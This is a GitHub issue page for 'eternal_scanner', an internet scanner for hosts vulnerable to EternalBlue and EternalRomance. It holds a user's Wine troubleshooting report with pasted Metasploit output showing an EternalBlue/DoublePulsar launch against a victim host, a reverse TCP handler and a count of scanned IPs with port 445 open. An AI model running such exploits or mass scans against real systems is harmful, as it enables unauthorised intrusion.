peterpt / eternal_scanner

An internet scanner for exploit CVE-2017-0144 (Eternal Blue) & CVE-2017-0145 (Eternal Romance)
MIT License
318 stars 105 forks source link

problem wine32 #10

Closed peterssssss closed 6 years ago

peterssssss commented 6 years ago

msf exploit(windows/smb/eternalblue_doublepulsar) > exploit

[] Started reverse TCP handler on IPLOCAL:4444 [] IPVICTIM:445 - Generating Eternalblue XML data [] IPVICTIM:445 - Generating Doublepulsar XML data [] IPVICTIM:445 - Generating payload DLL for Doublepulsar [] IPVICTIM:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] IPVICTIM:445 - Launching Eternalblue... 000f:err:service:process_send_command receiving command result timed out 0014:err:service:process_send_command receiving command result timed out 0029:err:plugplay:handle_bus_relations Failed to load driver L"WineHID" 0014:err:service:process_send_command receiving command result timed out 0029:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"

peterssssss commented 6 years ago

| Scanning for Ips with port 445 opened |

Ips detected with port 445 opened so far : 189